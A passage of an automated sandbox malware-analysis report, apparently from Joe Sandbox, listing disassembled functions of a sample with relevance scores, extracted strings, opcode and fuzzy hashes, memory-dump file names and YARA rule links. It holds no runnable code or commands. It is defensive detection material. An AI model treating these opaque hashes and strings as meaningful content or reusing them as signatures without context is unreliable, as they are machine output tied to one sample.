                                                                                                                          • API String ID: 0-1587471283
                                                                                                                          • Opcode ID: 2cee92390bb99711e27ce60c66fe5ed18b84f83747f1099426197e496e4160bc
                                                                                                                          • Instruction ID: becd8f94fd65eaac6e237be01b3b06495b168849b469a565143efb7a5ff10b00
                                                                                                                          • Opcode Fuzzy Hash: 2cee92390bb99711e27ce60c66fe5ed18b84f83747f1099426197e496e4160bc
                                                                                                                          • Instruction Fuzzy Hash: 6BB228F360C2149FE7046E2DEC4567ABBE9EF94320F1A4A3DE6C4C7744EA3598058693
                                                                                                                          Function 00CC5B42 Relevance: 9.0, Strings: 6, Instructions: 1545COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %Fy$'Y>}$'Y>}$3nw$;CxJ$P5Gs
                                                                                                                          • API String ID: 0-3315456142
                                                                                                                          • Opcode ID: 112bcd399e2e376f06a6ef708983664c161d438a159ca84b5d212b4f528420ea
                                                                                                                          • Instruction ID: ea2d69a26bf3224a480a0318331f4c06cf411565c50dd9e731eb2e5f94627095
                                                                                                                          • Opcode Fuzzy Hash: 112bcd399e2e376f06a6ef708983664c161d438a159ca84b5d212b4f528420ea
                                                                                                                          • Instruction Fuzzy Hash: 9BB2F3F3A082109FE304AE2DEC8567ABBE9EF94720F16453DEAC5C7744EA3558048797
                                                                                                                          Function 00CC4045 Relevance: 7.9, Strings: 5, Instructions: 1698COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (B?g$?Ws$D}$H$fau$$s@X
                                                                                                                          • API String ID: 0-821273520
                                                                                                                          • Opcode ID: 831bd718947d7e7ea8d8545ab06154ad71e1a323faab90616931bff6b45f4b7e
                                                                                                                          • Instruction ID: 67cca6dd166bec86e4f66fe90b63964ef2af598cdabbc3e579e7b1ef41821423
                                                                                                                          • Opcode Fuzzy Hash: 831bd718947d7e7ea8d8545ab06154ad71e1a323faab90616931bff6b45f4b7e
                                                                                                                          • Instruction Fuzzy Hash: 5FB24AF360C2049FD704AE2DEC8567BBBEAEBD4320F1A863DEAC4C7744E53558058696
                                                                                                                          Function 00B012F7 Relevance: 7.2, Strings: 5, Instructions: 922COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0$0$0$@$i
                                                                                                                          • API String ID: 0-3124195287
                                                                                                                          • Opcode ID: aa95123a536c52cf4907d6ed82881539996c5016fa8c220bf3125e36fa566977
                                                                                                                          • Instruction ID: e1ff0b5da121093510ecc62f86bf534b5bbff423f28ae888e5cbdf1f82a33b75
                                                                                                                          • Opcode Fuzzy Hash: aa95123a536c52cf4907d6ed82881539996c5016fa8c220bf3125e36fa566977
                                                                                                                          • Instruction Fuzzy Hash: 6162AD7160C3818BD319CF28C49876ABFE1EB95344F188AADE8D9872D1D774D949CB82
                                                                                                                          Function 00B0164F Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                          • API String ID: 0-1123320326
                                                                                                                          • Opcode ID: 4b2534c8044711ff20f63a4729a914e2d3f6c1b14e43d86ea66fe5675b7d0c76
                                                                                                                          • Instruction ID: adae32396cf6871c76a2b0a0c5d6a5a3479a8c758cfb52437ba425b9733da374
                                                                                                                          • Opcode Fuzzy Hash: 4b2534c8044711ff20f63a4729a914e2d3f6c1b14e43d86ea66fe5675b7d0c76
                                                                                                                          • Instruction Fuzzy Hash: E4F1833160C3818FC719CF29C49426AFFE1ABD9304F188AADE4D987396D774D949CB92
                                                                                                                          Function 00CCF8D6 Relevance: 6.6, Strings: 4, Instructions: 1645COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: "[{$077o$]\v$rv+S
                                                                                                                          • API String ID: 0-3959048912
                                                                                                                          • Opcode ID: d7e8f3cd3847b54effb95c6ae43204aed2dfa5bd8033a2b728639c4d1d6b0436
                                                                                                                          • Instruction ID: 07f35deb6c2cae9c53203858d936ef2f280f78baf7af5cbf0605da8b5a9d7a36
                                                                                                                          • Opcode Fuzzy Hash: d7e8f3cd3847b54effb95c6ae43204aed2dfa5bd8033a2b728639c4d1d6b0436
                                                                                                                          • Instruction Fuzzy Hash: C7B206F360C2049FE3046E2DEC8567ABBE9EF94720F16893DE6C4C7744EA3598018697
                                                                                                                          Function 00B013A3 Relevance: 6.6, Strings: 5, Instructions: 390COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                          • API String ID: 0-3620105454
                                                                                                                          • Opcode ID: 9635893936dff7c2973eddf36c219bd7fab8c9623295b2a95bbb2752ecfca9b6
                                                                                                                          • Instruction ID: 6d6601a5911eaf395fd577a985631a4d8f15166ea84bb17a7b21db9d26eba8c9
                                                                                                                          • Opcode Fuzzy Hash: 9635893936dff7c2973eddf36c219bd7fab8c9623295b2a95bbb2752ecfca9b6
                                                                                                                          • Instruction Fuzzy Hash: 61D18F356087818FC719CF29C48426AFFE2AFD9304F08CAADE4D987396D634D949CB52
                                                                                                                          Function 00CCA982 Relevance: 6.6, Strings: 4, Instructions: 1579COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ed$!Wwz$6pWv$wrw_
                                                                                                                          • API String ID: 0-2302259430
                                                                                                                          • Opcode ID: c6466d7774e06ada4bb359303535dca8941105e7b20e1f4a427aea97d02c6717
                                                                                                                          • Instruction ID: 88439b614e6a69e89a5d0a1edaa2f6a91c65c8932595945e15d23926533f06e3
                                                                                                                          • Opcode Fuzzy Hash: c6466d7774e06ada4bb359303535dca8941105e7b20e1f4a427aea97d02c6717
                                                                                                                          • Instruction Fuzzy Hash: 10B2F8F360C204AFE3046E2DEC8567AFBE9EB94720F16493DEAC4C7744EA3558058697
                                                                                                                          Function 00B2FD10 Relevance: 5.7, Strings: 4, Instructions: 667COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: :$NA_I$m1s3$uvw
                                                                                                                          • API String ID: 0-3973114637
                                                                                                                          • Opcode ID: 119a6a917923b63e0386d066fdc50874337ee6b125aa5cfa3aedf4a21b8c96cc
                                                                                                                          • Instruction ID: da8d31f8c09c4a53e834b41f4485dabd05e09a07f190ed0da2cee11f45b5e2b4
                                                                                                                          • Opcode Fuzzy Hash: 119a6a917923b63e0386d066fdc50874337ee6b125aa5cfa3aedf4a21b8c96cc
                                                                                                                          • Instruction Fuzzy Hash: 7E3297B05183819FD311EF28D890B2ABBE5EF89341F244EACF5D58B2A2D735D905CB52
                                                                                                                          Function 00B13BE2 Relevance: 5.4, Strings: 4, Instructions: 431COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+($;z$p$ss
                                                                                                                          • API String ID: 0-2391135358
                                                                                                                          • Opcode ID: ee6b56813f468890a9d919a5864c926859a3236789ee5ea210e8b7d0cc0bbbe1
                                                                                                                          • Instruction ID: 1de40f4601893e7f54549a442fd286a99687143af1ac0e2c932cc91cf2b0bb09
                                                                                                                          • Opcode Fuzzy Hash: ee6b56813f468890a9d919a5864c926859a3236789ee5ea210e8b7d0cc0bbbe1
                                                                                                                          • Instruction Fuzzy Hash: D0027EB4810B00DFD760DF24D986756BFF4FB06701F90499DE89A9B685E330E859CBA2
                                                                                                                          Function 00B22260 Relevance: 5.4, Strings: 4, Instructions: 383COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: a|$hu$lc$sj
                                                                                                                          • API String ID: 0-3748788050
                                                                                                                          • Opcode ID: 147f2cdb6a29aefd2b1179eb5afa8ca143128bafae2e4b63ddb8b32f01fbc13a
                                                                                                                          • Instruction ID: f6ad005aa500307a43e8c0ea7e07b8f921b3fd60efc7930784b20bacae1ac623
                                                                                                                          • Opcode Fuzzy Hash: 147f2cdb6a29aefd2b1179eb5afa8ca143128bafae2e4b63ddb8b32f01fbc13a
                                                                                                                          • Instruction Fuzzy Hash: D1A19B704083509BC720DF18D891A2BB7F0FFA5354F148A4CE8D99B3A1E339D941CB96
                                                                                                                          Function 00B2D7AF Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #'$CV$KV$T>
                                                                                                                          • API String ID: 0-95592268
                                                                                                                          • Opcode ID: 0af3fc07de6ac9e7b3e1f3c1396fd224671471b3870411f4d6e7256a68fe5604
                                                                                                                          • Instruction ID: 65a8b9400d504c7d32415460b4eb17dc2be94003fa1dc3f9e69bcc16e75b6cef
                                                                                                                          • Opcode Fuzzy Hash: 0af3fc07de6ac9e7b3e1f3c1396fd224671471b3870411f4d6e7256a68fe5604
                                                                                                                          • Instruction Fuzzy Hash: F28155B48017459BCB20DFA5D28516EBFF1FF16300F604A4CE4866BA55C330AA55CFE2
                                                                                                                          Function 00B2AC91 Relevance: 5.1, Strings: 4, Instructions: 128COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (g6e$,{*y$4c2a$lk
                                                                                                                          • API String ID: 0-1327526056
                                                                                                                          • Opcode ID: f89526e92fcfa94ae9076c6529908f5252af09eb7480f7f94e34da4bc4e98596
                                                                                                                          • Instruction ID: 7dfe84c61a143298513cd3294c27b22b2b1358fe1f4e3f38f13c313ddae0188d
                                                                                                                          • Opcode Fuzzy Hash: f89526e92fcfa94ae9076c6529908f5252af09eb7480f7f94e34da4bc4e98596
                                                                                                                          • Instruction Fuzzy Hash: 064186B4408381CBD7209F24E900BABB7F0FF86746F5499ADE5C897260EB31D945CB96
                                                                                                                          Function 00B2C470 Relevance: 4.2, Strings: 3, Instructions: 419COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+($%*+($~/i!
                                                                                                                          • API String ID: 0-4033100838
                                                                                                                          • Opcode ID: 9fb777e5936a50e984a985fabe341fab3b89d1d186249fbccea61b765b646942
                                                                                                                          • Instruction ID: da0bb62dcfd6220a375ae5299359aadcf11d2256e4714d599eca05bc8e4633fe
                                                                                                                          • Opcode Fuzzy Hash: 9fb777e5936a50e984a985fabe341fab3b89d1d186249fbccea61b765b646942
                                                                                                                          • Instruction Fuzzy Hash: 1BE186B5519340DFE3209F28E881B2EBBF5FB85345F588CACE5898B251DB31D815CB92
                                                                                                                          Function 00B08590 Relevance: 4.1, Strings: 3, Instructions: 387COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
